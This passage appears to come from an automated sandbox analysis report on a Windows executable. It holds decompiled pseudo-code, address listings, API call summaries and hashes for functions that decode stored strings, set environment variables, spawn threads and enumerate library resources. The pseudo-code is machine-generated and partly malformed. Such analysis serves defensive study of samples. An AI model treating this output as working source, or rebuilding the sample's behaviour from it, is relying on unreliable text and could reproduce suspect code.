					_t384 = 0xe - _v8;
					if(0xe < _v8) {
						break;
					}
					_t217 =  *0x41808c; // 0x41708e
					_v4 =  *_t217;
					 *0x41808c =  *0x41808c + 1;
					_t219 = E0040E4C0();
					_t344 = _t311;
					_push(_t219);
					_push(_t344);
					_t220 = E0040E4C0();
					E00405D60(_t384, _v4 * 0xffffffff);
					E0040E500( &_v8, _t220);
					_t346 =  *0x418090; // 0x22f0568
					_t224 = E0040E4C0();
					_t347 = _t346;
					E0040E660(_t347);
					_t311 = _v20;
					E0040E660(_t311);
					E0040E500(0x418090, _t224);
					 *_t371 =  *_t371 + 1;
					if( *_t371 >= 0) {
						continue;
					}
					break;
				}
				 *0x41808c = 0x4170e8;
				_v8 = 0;
				while(1) {
					_t386 = 9 - _v8;
					if(9 < _v8) {
						break;
					}
					_t205 =  *0x41808c; // 0x41708e
					_v4 =  *_t205;
					 *0x41808c =  *0x41808c + 1;
					_t207 = E0040E4C0();
					_t340 = _t311;
					_push(_t207);
					_push(_t340);
					_t208 = E0040E4C0();
					E00405D60(_t386, _v4 * 0xffffffff);
					E0040E500( &_v8, _t208);
					_t342 =  *0x4180e0; // 0x22f48c0
					_t212 = E0040E4C0();
					_t343 = _t342;
					E0040E660(_t343);
					_t311 = _v20;
					E0040E660(_t311);
					E0040E500(0x4180e0, _t212); // executed
					 *_t371 =  *_t371 + 1;
					if( *_t371 >= 0) {
						continue;
					}
					break;
				}
				 *0x41808c = 0x417080;
				_v8 = 0;
				while(1) {
					_t388 = 4 - _v8;
					if(4 < _v8) {
						break;
					}
					_t193 =  *0x41808c; // 0x41708e
					_v4 =  *_t193;
					 *0x41808c =  *0x41808c + 1;
					_t195 = E0040E4C0();
					_t336 = _t311;
					_push(_t195);
					_push(_t336);
					_t196 = E0040E4C0();
					E00405D60(_t388, _v4 * 0xffffffff);
					E0040E500( &_v8, _t196);
					_t338 =  *0x4180bc; // 0x22f7ff8
					_t200 = E0040E4C0();
					_t339 = _t338;
					E0040E660(_t339);
					_t311 = _v20;
					E0040E660(_t311);
					E0040E500(0x4180bc, _t200);
					 *_t371 =  *_t371 + 1;
					if( *_t371 >= 0) {
						continue;
					}
					break;
				}
				 *0x41808c = 0x4170ff;
				_v8 = 0;
				while(1) {
					_t390 = 3 - _v8;
					if(3 < _v8) {
						break;
					}
					_t181 =  *0x41808c; // 0x41708e
					_v4 =  *_t181;
					 *0x41808c =  *0x41808c + 1;
					_t183 = E0040E4C0();
					_t332 = _t311;
					_push(_t183);
					_push(_t332);
					_t184 = E0040E4C0();
					E00405D60(_t390, _v4 * 0xffffffff);
					E0040E500( &_v8, _t184);
					_t334 =  *0x4180b8; // 0x22f97f8
					_t188 = E0040E4C0();
					_t335 = _t334;
					E0040E660(_t335);
					_t311 = _v20;
					E0040E660(_t311);
					E0040E500(0x4180b8, _t188);
					 *_t371 =  *_t371 + 1;
					_t391 =  *_t371;
					if( *_t371 >= 0) {
						continue;
					}
					break;
				}
				_t312 =  *0x4180b8; // 0x22f97f8
				_t103 = E0040E4C0();
				_t313 = _t312;
				E0040E660(_t313);
				_t314 = _a8;
				E0040E660(_t314);
				E0040E500(0x4180b8, _t103);
				_t108 = E0040E4C0();
				_t315 = _t314;
				E00403221(_t368, _t370, _v8, _v4);
				E0040E500( &_v0, _t108);
				_v4 = E004097FE();
				 *0x4180ac = GetModuleHandleW(0);
				_t114 = E0040E4C0();
				_t316 = _t315;
				_push(_t114);
				_t115 = E0040E4C0();
				_t317 = _t316;
				_push(_t115);
				_t116 = E0040E4C0();
				_t318 = _t317;
				_push(_t116);
				_t117 = E0040E4C0();
				_t319 = _t318;
				E00405182(E0040D720( *0x4180a0, 1, _t117));
				_v64 = _v64 + _t319;
				E00405E50(_t310, _t391);
				_push( &_v20);
				E0040E500();
				_t123 = E0040E4C0();
				_t320 = _t319;
				_push(_t123);
				_t124 = E0040E4C0();
				_t321 = _t320;
				_push(_t124);
				_t125 = E0040E4C0();
				_t322 = _t321;
				_push(_t125);
				_t126 = E0040E4C0();
				_t323 = _t322;
				E00405182(E0040D720(_v28, 1, _t126));
				 *_t371 =  *_t371 + _t323;
				E00405E50(_t310, _t391);
				_push( &_v48);
				E0040E500();
				_v56 = E00402E49(_v56);
				_t133 = E0040E4C0();
				_t324 = _t323;
				E004051A0(E00402150(_t310, _t324, _t368, _t369, _v56, _t133));
				E0040196C(_t324);
				E0040469C(_t324, _t369, _v64);
				_t138 = E0040E4C0();
				_t325 = _t324;
				_push(_t138);
				_push(_v100);
				_push(_v68 + 4);
				_pop(_t139);
				_t140 = E00405100(_t139);
				E00403539(_t369);
				E0040E500(0x4180a8, _t140);
				PathRemoveBackslashW( *0x4180a8);
				E00402068(_v84);
				_t146 = E0040E4C0();
				_t326 = _t325;
				_push(_t146);
				_t147 = E0040E4C0();
				_t327 = _t326;
				E00402BA6(_t391,  *0x4180a8);
				E00405182(E0040E6C0(_t310));
				_v144 = _v144 + _t327;
				E004051A0(E00409945(_v108, _t147));
				_t328 =  *0x418084; // 0x22f4a50
				_t153 = E0040E4C0();
				_t329 = _t328;
				E0040E660(_t329);
				_t330 =  *0x4180b8; // 0x22f97f8
				E0040E660(_t330);
				E0040E500(0x4180b8, _t153);
				E00403801(_t310, _t368);
				_t159 = E0040E4C0();
				_t331 = _t330;
				E00401E66(_t331, _t369, _t391, _v128);
				E0040E500( &_v120, _t159);
				_t291 =  *0x4180c0; // 0x0
				_t392 = _t291 - 1;
				if(_t291 != 1) {
					E00402C55(_t368, _t369,  *((intOrPtr*)(_t371 + 0x28)));
				} else {
					 *0x418070 = E0040548C(_t291, E00402C55,  *((intOrPtr*)(_t371 + 0x28)));
				}
				_a24 = E00403C83(_t392, _a36, _a20, _a4,  *((intOrPtr*)(_t371 + 0x18)));
				SetConsoleCtrlHandler(E004020CE, 0);
				_push(_a20);
				E00401FBA(_t291);
				return E0040E590(E0040E590(E0040E590(E0040E590(E0040E590(E0040E590(E0040E590(E0040E590(E0040E590(0, _a4), _a8), _v32), _v32),  *((intOrPtr*)(_t371 + 8))),  *((intOrPtr*)(_t371 + 0x14))), _v28),  *((intOrPtr*)(_t371 + 0x1c))),  *((intOrPtr*)(_t371 + 0x18)));
			}






























































































































                                        0x00403f53
                                        0x00403f53
                                        0x00403f53
                                        0x00403f53
                                        0x00403f54
                                        0x00403f59
                                        0x00403f59
                                        0x00403f5c
                                        0x00403f63
                                        0x00403f63
                                        0x00403f66
                                        0x00403f70
                                        0x00403f75
                                        0x00403f7e
                                        0x00403f83
                                        0x00403f86
                                        0x00000000
                                        0x00000000
                                        0x00403f88
                                        0x00403f90
                                        0x00403f94
                                        0x00403f9b
                                        0x00403fa0
                                        0x00403fa1
                                        0x00403fa2
                                        0x00403fa3
                                        0x00403fb2
                                        0x00403fbc
                                        0x00403fc5
                                        0x00403fc6
                                        0x00403fcb
                                        0x00403fce
                                        0x00403fd3
                                        0x00403fd8
                                        0x00403fe2
                                        0x00403fe7
                                        0x00403fea
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403fea
                                        0x00403ff1
                                        0x00403ff6
                                        0x00403fff
                                        0x00404004
                                        0x00404007
                                        0x00000000
                                        0x00000000
                                        0x00404009
                                        0x00404011
                                        0x00404015
                                        0x0040401c
                                        0x00404021
                                        0x00404022
                                        0x00404023
                                        0x00404024
                                        0x00404033
                                        0x0040403d
                                        0x00404046
                                        0x00404047
                                        0x0040404c
                                        0x0040404f
                                        0x00404054
                                        0x00404059
                                        0x00404063
                                        0x00404068
                                        0x0040406b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040406b
                                        0x00404072
                                        0x00404077
                                        0x00404080
                                        0x00404085
                                        0x00404088
                                        0x00000000
                                        0x00000000
                                        0x0040408a
                                        0x00404092
                                        0x00404096
                                        0x0040409d
                                        0x004040a2
                                        0x004040a3
                                        0x004040a4
                                        0x004040a5
                                        0x004040b4
                                        0x004040be
                                        0x004040c7
                                        0x004040c8
                                        0x004040cd
                                        0x004040d0
                                        0x004040d5
                                        0x004040da
                                        0x004040e4
                                        0x004040e9
                                        0x004040ec
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004040ec
                                        0x004040f3
                                        0x004040f8
                                        0x00404101
                                        0x00404106
                                        0x00404109
                                        0x00000000
                                        0x00000000
                                        0x0040410b
                                        0x00404113
                                        0x00404117
                                        0x0040411e
                                        0x00404123
                                        0x00404124
                                        0x00404125
                                        0x00404126
                                        0x00404135
                                        0x0040413f
                                        0x00404148
                                        0x00404149
                                        0x0040414e
                                        0x00404151
                                        0x00404156
                                        0x0040415b
                                        0x00404165
                                        0x0040416a
                                        0x0040416d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040416d
                                        0x00404174
                                        0x00404179
                                        0x00404182
                                        0x00404187
                                        0x0040418a
                                        0x00000000
                                        0x00000000
                                        0x0040418c
                                        0x00404194
                                        0x00404198
                                        0x0040419f
                                        0x004041a4
                                        0x004041a5
                                        0x004041a6
                                        0x004041a7
                                        0x004041b6
                                        0x004041c0
                                        0x004041c9
                                        0x004041ca
                                        0x004041cf
                                        0x004041d2
                                        0x004041d7
                                        0x004041dc
                                        0x004041e6
                                        0x004041eb
                                        0x004041ee
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004041ee
                                        0x004041f5
                                        0x004041fa
                                        0x00404203
                                        0x00404208
                                        0x0040420b
                                        0x00000000
                                        0x00000000
                                        0x0040420d
                                        0x00404215
                                        0x00404219
                                        0x00404220
                                        0x00404225
                                        0x00404226
                                        0x00404227
                                        0x00404228
                                        0x00404237
                                        0x00404241
                                        0x00404246
                                        0x0040424d
                                        0x00404252
                                        0x00404255
                                        0x0040425a
                                        0x0040425f
                                        0x0040426b
                                        0x00404270
                                        0x00404273
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404273
                                        0x0040427a
                                        0x0040427f
                                        0x00404288
                                        0x0040428d
                                        0x00404290
                                        0x00000000
                                        0x00000000
                                        0x00404292
                                        0x0040429a
                                        0x0040429e
                                        0x004042a5
                                        0x004042aa
                                        0x004042ab
                                        0x004042ac
                                        0x004042ad
                                        0x004042bc
                                        0x004042c6
                                        0x004042cb
                                        0x004042d2
                                        0x004042d7
                                        0x004042da
                                        0x004042df
                                        0x004042e4
                                        0x004042f0
                                        0x004042f5
                                        0x004042f8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004042f8
                                        0x004042ff
                                        0x00404304
                                        0x0040430d
                                        0x00404312
                                        0x00404315
                                        0x00000000
                                        0x00000000
                                        0x00404317
                                        0x0040431f
                                        0x00404323
                                        0x0040432a
                                        0x0040432f
                                        0x00404330
                                        0x00404331
                                        0x00404332
                                        0x00404341
                                        0x0040434b
                                        0x00404350
                                        0x00404357
                                        0x0040435c
                                        0x0040435f
                                        0x00404364
                                        0x00404369
                                        0x00404375
                                        0x0040437a
                                        0x0040437d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040437d
                                        0x00404384
                                        0x00404389
                                        0x00404392
                                        0x00404397
                                        0x0040439a
                                        0x00000000
                                        0x00000000
                                        0x0040439c
                                        0x004043a4
                                        0x004043a8
                                        0x004043af
                                        0x004043b4
                                        0x004043b5
                                        0x004043b6
                                        0x004043b7
                                        0x004043c6
                                        0x004043d0
                                        0x004043d5
                                        0x004043dc
                                        0x004043e1
                                        0x004043e4
                                        0x004043e9
                                        0x004043ee
                                        0x004043fa
                                        0x004043ff
                                        0x004043ff
                                        0x00404402
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404402
                                        0x00404404
                                        0x0040440b
                                        0x00404410
                                        0x00404413
                                        0x00404418
                                        0x0040441d
                                        0x00404429
                                        0x0040442f
                                        0x00404434
                                        0x0040443e
                                        0x00404448
                                        0x00404452
                                        0x00404460
                                        0x00404466
                                        0x0040446b
                                        0x0040446c
                                        0x0040446e
                                        0x00404473
                                        0x00404474
                                        0x00404476
                                        0x0040447b
                                        0x0040447c
                                        0x0040447e
                                        0x00404483
                                        0x00404495
                                        0x0040449a
                                        0x0040449d
                                        0x004044a6
                                        0x004044a7
                                        0x004044ad
                                        0x004044b2
                                        0x004044b3
                                        0x004044b5
                                        0x004044ba
                                        0x004044bb
                                        0x004044bd
                                        0x004044c2
                                        0x004044c3
                                        0x004044c5
                                        0x004044ca
                                        0x004044da
                                        0x004044df
                                        0x004044e2
                                        0x004044eb
                                        0x004044ec
                                        0x004044fa
                                        0x004044ff
                                        0x00404504
                                        0x0040450f
                                        0x00404514
                                        0x0040451d
                                        0x00404523
                                        0x00404528
                                        0x00404529
                                        0x0040452a
                                        0x00404535
                                        0x00404536
                                        0x00404537
                                        0x0040453d
                                        0x00404549
                                        0x00404554
                                        0x0040455d
                                        0x00404563
                                        0x00404568
                                        0x00404569
                                        0x0040456b
                                        0x00404570
                                        0x00404578
                                        0x00404586
                                        0x0040458b
                                        0x00404594
                                        0x00404599
                                        0x004045a0
                                        0x004045a5
                                        0x004045a8
                                        0x004045ad
                                        0x004045b4
                                        0x004045c0
                                        0x004045c5
                                        0x004045cb
                                        0x004045d0
                                        0x004045d6
                                        0x004045e0
                                        0x004045e5
                                        0x004045eb
                                        0x004045ee
                                        0x0040460c
                                        0x004045f0
                                        0x00404601
                                        0x00404601
                                        0x00404626
                                        0x00404636
                                        0x0040463b
                                        0x0040463f
                                        0x0040469b

                                        APIs
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 0040E660: wcslen.MSVCRT ref: 0040E677
                                          • Part of subcall function 0040E500: RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E55C
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,022F97F8,00000000,00000000), ref: 0040445B
                                        • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00404554
                                          • Part of subcall function 00402BA6: GetShortPathNameW.KERNEL32 ref: 00402BE0
                                          • Part of subcall function 0040E6C0: TlsGetValue.KERNEL32(0000001B,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E6CA
                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                          • Part of subcall function 00409945: SetEnvironmentVariableW.KERNELBASE(022F97F8,022F97F8,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040995E
                                          • Part of subcall function 00401E66: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,004045DB,00000000,00000000,00000000,022F97F8,022F4A50,00000000,00000000), ref: 00401E9B
                                        • SetConsoleCtrlHandler.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,022F97F8,022F4A50,00000000,00000000,00000000), ref: 00404636
                                          • Part of subcall function 0040548C: CreateThread.KERNEL32 ref: 004054A5
                                          • Part of subcall function 0040548C: RtlEnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                                          • Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                                          • Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                                          • Part of subcall function 0040548C: RtlLeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Value$Path$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseConsoleCreateCtrlEnterEnvironmentHandlerLeaveModuleNameObjectQuoteRemoveShortSingleSpacesThreadVariableWaitwcslen
                                        • String ID: pA
                                        • API String ID: 2577741277-3402996844
                                        • Opcode ID: eea1f16e65e028aed364a52a519529f204a41320244849be5dc748d6705201b0
                                        • Instruction ID: e598b1676e1357044bd842947de7ef6ff66df082c195e1d1cc9db13808c293ed
                                        • Opcode Fuzzy Hash: eea1f16e65e028aed364a52a519529f204a41320244849be5dc748d6705201b0
                                        • Instruction Fuzzy Hash: 90121AB5514304AED240BB739C81A7F7BACEB88718F10CD3FF544AA192DA3CD8559B29
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403C83, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 56%
                                        			E00403C83(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v16;
				char _v20;
				WCHAR* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t33;
				void* _t37;
				void* _t43;
				void* _t44;
				void* _t48;
				void* _t53;
				void* _t56;
				void* _t57;
				intOrPtr _t66;
				intOrPtr _t80;
				void* _t81;
				void* _t83;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				void* _t90;
				void* _t94;
				intOrPtr _t95;
				WCHAR** _t96;
				void* _t98;

				_t98 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0040E600();
				E00405060(_t96, _a4);
				E00405060( &_v24, _a8);
				E00405060( &_v20, _a12);
				_t75 =  &_v16;
				E00405060( &_v16, _a16);
				_t80 =  *0x418098; // 0x22f4ad0
				_t33 = E0040E4C0();
				_t81 = _t80;
				E0040E660(_t81);
				E0040E500( &_v16, _t33);
				PathQuoteSpacesW(_v24);
				_push(_v24);
				_t37 = E0040E4C0();
				_pop(_t83);
				E0040E660(_t83);
				E0040E660(0x417026);
				_t85 = _v48;
				E0040E660(_t85);
				E0040E500( &_v52, _t37);
				PathQuoteSpacesW( *_t96);
				_t43 = E0040E4C0();
				_t86 = _t85;
				_push(_t43);
				_push(0x44);
				_t44 = E0040E4C0();
				_t87 = _t86;
				_push(_t44);
				_push(_t87);
				E0040AE15(_t98, E0040E4C0());
				E0040E6C0( &_v16);
				_push(_v52);
				_t48 = E0040E4C0();
				_pop(_t90);
				_push(_t48);
				E0040E660(_t90);
				E0040E660(0x417026);
				E0040E660(_v72);
				E0040E6C0( &_v16);
				_push(_v72);
				_t53 = E0040E4C0();
				_pop(_t94);
				E0040E660(_t94);
				_t95 = _v72;
				_t56 = E00405182(E0040E660(_t95));
				 *_t96 =  *_t96 + _t95;
				_t57 = E00405182(_t56);
				_v100 = _v100 + _t95;
				E00405182(_t57);
				_v96 = _v96 + _t95;
				 *0x4180cc = E004051A0(E004099A5(), _t53);
				while(E00409897( *0x4180cc) != 0) {
					_push(0xa); // executed
					E004056D8(); // executed
				}
				E004098DE( *0x4180cc);
				_v16 = E00409EEC(_t75,  *0x4180cc);
				E004098EF( *0x4180cc);
				_t66 = _v20;
				return E0040E590(E0040E590(E0040E590(E0040E590(E0040E590(_t66,  *_t96), _v24), _v20), _v36), _v32);
			}

































                                        0x00403c83
                                        0x00403c86
                                        0x00403c87
                                        0x00403c88
                                        0x00403c89
                                        0x00403c8a
                                        0x00403c8b
                                        0x00403c8c
                                        0x00403c98
                                        0x00403ca5
                                        0x00403cb2
                                        0x00403cbb
                                        0x00403cbf
                                        0x00403cc4
                                        0x00403ccb
                                        0x00403cd0
                                        0x00403cd3
                                        0x00403cdd
                                        0x00403ce6
                                        0x00403cef
                                        0x00403cf0
                                        0x00403cf5
                                        0x00403cf8
                                        0x00403d03
                                        0x00403d08
                                        0x00403d0d
                                        0x00403d17
                                        0x00403d1f
                                        0x00403d25
                                        0x00403d2a
                                        0x00403d2b
                                        0x00403d2c
                                        0x00403d32
                                        0x00403d37
                                        0x00403d38
                                        0x00403d39
                                        0x00403d41
                                        0x00403d46
                                        0x00403d4f
                                        0x00403d50
                                        0x00403d55
                                        0x00403d56
                                        0x00403d58
                                        0x00403d63
                                        0x00403d6d
                                        0x00403d72
                                        0x00403d7b
                                        0x00403d7c
                                        0x00403d81
                                        0x00403d84
                                        0x00403d89
                                        0x00403d93
                                        0x00403d98
                                        0x00403d9b
                                        0x00403da0
                                        0x00403da4
                                        0x00403da9
                                        0x00403db7
                                        0x00403dbc
                                        0x00403dcb
                                        0x00403dd0
                                        0x00403dd0
                                        0x00403ddd
                                        0x00403ded
                                        0x00403df7
                                        0x00403dfc
                                        0x00403e34

                                        APIs
                                          • Part of subcall function 0040E600: TlsGetValue.KERNEL32(0000001B,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417060), ref: 0040E617
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 0040E660: wcslen.MSVCRT ref: 0040E677
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                        • PathQuoteSpacesW.SHLWAPI(00000000,00000000,022F4AD0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404626,00000000,00000000,00000000,?), ref: 00403CE6
                                          • Part of subcall function 0040E500: RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E55C
                                        • PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00417026,00000000,00000000,00000000,00000000,022F4AD0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403D1F
                                          • Part of subcall function 0040AE15: GetCurrentDirectoryW.KERNEL32(00000104,00000000,00000104,00000000,?,?,0000000A,004037B6,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746), ref: 0040AE2B
                                          • Part of subcall function 0040E6C0: TlsGetValue.KERNEL32(0000001B,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E6CA
                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                          • Part of subcall function 00409897: WaitForSingleObject.KERNEL32(022F97F8,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,00417026,?,00000000,00000000,00000000,00000044), ref: 004098A4
                                          • Part of subcall function 00409897: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,022F97F8,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,00417026,?), ref: 004098C1
                                          • Part of subcall function 004056D8: timeBeginPeriod.WINMM(00000001,00403793,00000001,?,00000000,00417020,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000,00000000), ref: 004056E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Value$AllocateErrorHeapLastPathQuoteSpaces$BeginCurrentDirectoryNamedObjectPeekPeriodPipeSingleWaittimewcslen
                                        • String ID: &pA$&pA
                                        • API String ID: 2955313036-1657054507
                                        • Opcode ID: 8102c5396e5127024856a3554c7267c3854acb245718258a7942441030bc4036
                                        • Instruction ID: 3e360011a83c720f245a1fcc760786e8a23483cfa18b9fb1fadf678805a49567
                                        • Opcode Fuzzy Hash: 8102c5396e5127024856a3554c7267c3854acb245718258a7942441030bc4036
                                        • Instruction Fuzzy Hash: AD412975514205AAC200BF73DC82D6F7669EFD4B0CF10CD3EB14436092DA3D99259B6A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401BA0, Relevance: 4.7, APIs: 3, Instructions: 233libraryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 44%
                                        			E00401BA0(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr __ebp;
				void* _t28;
				void* _t29;
				void* _t30;
				struct HINSTANCE__* _t33;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				struct HINSTANCE__** _t56;
				void* _t57;

				_t57 = __eflags;
				_t51 = __edx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0040E600();
				_t28 = E0040E4C0();
				_t52 = _t51;
				_push(_t28);
				_push(2);
				_push(0);
				_t29 = E0040E4C0();
				_t53 = _t52;
				_push(_t29);
				_t30 = E0040E4C0();
				_t54 = _t53;
				E00405182(E00409638(_t57, _t30));
				 *_t56 =  *_t56 + _t54; // executed
				_t33 = LoadLibraryExW(??, ??, ??); // executed
				 *_t56 = E004051A0(_t33);
				EnumResourceTypesW(_t56[2], E00402033, 0);
				FreeLibrary( *_t56);
				if(E0040AA63( *0x418108) <= 0) {
					goto L1;
				} else {
					__eax = E0040AA6D( *0x418108);
					while(1) {
						__eax = E0040AA82( *0x418108);
						__eax = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							break;
						}
						__ebp =  *0x41810c; // 0x0
						__edx =  *((intOrPtr*)(__ebp + 8));
						_push( *((intOrPtr*)(__ebp + 8)));
						__eax = E0040E4C0();
						_pop(__edx);
						E0040E660(__edx) = __esp + 8;
						__eax = E0040E500(__esp + 8, __esp + 8);
						__eax = E00405D80( *((intOrPtr*)(__esp + 4)));
						__eflags = __eax - 0xa;
						if(__eax <= 0xa) {
							__edx =  *((intOrPtr*)(__esp + 4));
							_push( *((intOrPtr*)(__esp + 4)));
							__eax = E0040E4C0();
							_pop(__edx);
							E0040E660(__edx) = __esp + 0x10;
							__eax = E0040E500(__esp + 0x10, __esp + 0x10);
						} else {
							__edx =  *((intOrPtr*)(__esp + 8));
							_push( *((intOrPtr*)(__esp + 8)));
							__eax = E0040E4C0();
							_pop(__edx);
							__eax = E0040E660(__edx);
							__edx =  *((intOrPtr*)(__esp + 8));
							E0040E660( *((intOrPtr*)(__esp + 8))) = __esp + 0xc;
							__eax = E0040E500(__esp + 0xc, __esp + 0xc);
						}
					}
					_push( *0x418108);
					__eax = E0040AAB6();
					__eax = E0040E4C0();
					__edx = __edx;
					_push(__eax);
					__eax = E0040E4C0();
					__edx = __edx;
					_push(__eax);
					__eax = E0040E4C0();
					__edx = __edx;
					_push(__eax);
					__eax = E0040E4C0();
					__edx = __edx;
					_push(__eax);
					_push(1);
					__eax = E0040E4C0();
					__edx = __edx;
					_push(__eax);
					__eax = E0040E4C0();
					__edx = __edx;
					E00405DB0( *((intOrPtr*)(__esp + 0x24))) = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					E0040D720() = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					__eax = __esp + 0x14;
					_push(__esp + 0x14);
					__eax = E0040E500();
					__edx =  *((intOrPtr*)(__esp + 0x10));
					_push( *((intOrPtr*)(__esp + 0x10)));
					__eax = E0040E4C0();
					_pop(__edx);
					E0040E660(__edx) = __esp + 0x18;
					__eax = E0040E500(__esp + 0x18, __esp + 0x18); // executed
					__eax = E0040E4C0();
					__edx = __edx;
					_push(__eax);
					__eax = E0040E4C0();
					__edx = __edx;
					_push(__eax);
					__eax = E0040E4C0();
					__edx = __edx;
					_push(__eax);
					__eax = E0040E4C0();
					__edx = __edx;
					__eax = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					__eflags =  *__esp;
					E00405E50(__ecx,  *__esp) = __esp + 0x14;
					_push(__esp + 0x14);
					__eax = E0040E500();
					__eax = E0040E4C0();
					__edx = __edx;
					_push(__eax);
					__eax = E0040E4C0();
					__edx = __edx;
